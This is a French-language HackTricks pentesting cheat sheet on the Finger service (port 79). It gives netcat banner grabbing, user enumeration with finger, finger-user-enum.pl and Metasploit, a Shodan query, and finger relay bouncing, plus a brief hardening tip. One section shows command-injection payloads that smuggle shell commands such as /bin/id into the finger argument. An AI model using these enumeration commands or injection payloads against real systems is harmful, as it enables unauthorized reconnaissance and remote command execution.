hacktricks/network-services-pentesting/pentesting-finger.md
2023-06-03 13:10:46 +00:00

4.5 KiB

Informations de base

Finger est un programme que vous pouvez utiliser pour trouver des informations sur les utilisateurs d'ordinateurs. Il affiche généralement le nom d'utilisateur, le nom complet et éventuellement d'autres détails sur l'utilisateur que vous interrogez. Ces détails peuvent inclure l'emplacement du bureau et le numéro de téléphone (si connu), l'heure de connexion, le temps d'inactivité, l'heure à laquelle le courrier a été lu pour la dernière fois, ainsi que les fichiers de plan et de projet de l'utilisateur.

Port par défaut: 79

PORT   STATE SERVICE
79/tcp open  finger

Énumération

Récupération de bannière/Connexion de base

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Énumération d'utilisateurs


Finger

Le service Finger est un service de recherche d'informations sur les utilisateurs d'un système. Il est généralement utilisé pour obtenir des informations sur les utilisateurs d'un système distant. Le service Finger est généralement disponible sur les systèmes Unix et Linux.

Pour utiliser le service Finger, il suffit de se connecter au système distant et d'exécuter la commande finger. La commande finger affiche une liste des utilisateurs du système distant, ainsi que des informations sur ces utilisateurs, telles que leur nom, leur adresse électronique et leur dernière heure de connexion.

Le service Finger peut être utilisé pour effectuer une énumération d'utilisateurs sur un système distant. En utilisant le service Finger, un attaquant peut obtenir une liste des utilisateurs du système distant, ce qui peut l'aider à cibler ses attaques.

Comment se protéger

Pour se protéger contre l'énumération d'utilisateurs via le service Finger, il est recommandé de désactiver le service Finger sur les systèmes Unix et Linux. Si le service Finger est nécessaire, il est recommandé de limiter l'accès au service Finger aux utilisateurs autorisés uniquement.

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternativement, vous pouvez utiliser finger-user-enum de pentestmonkey, voici quelques exemples :

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap exécute un script pour utiliser les scripts par défaut

Metasploit utilise plus de techniques que Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Exécution de commandes

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Rebond de Finger

Utiliser un système comme relais de finger

finger user@host@victim
finger @internal@external
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥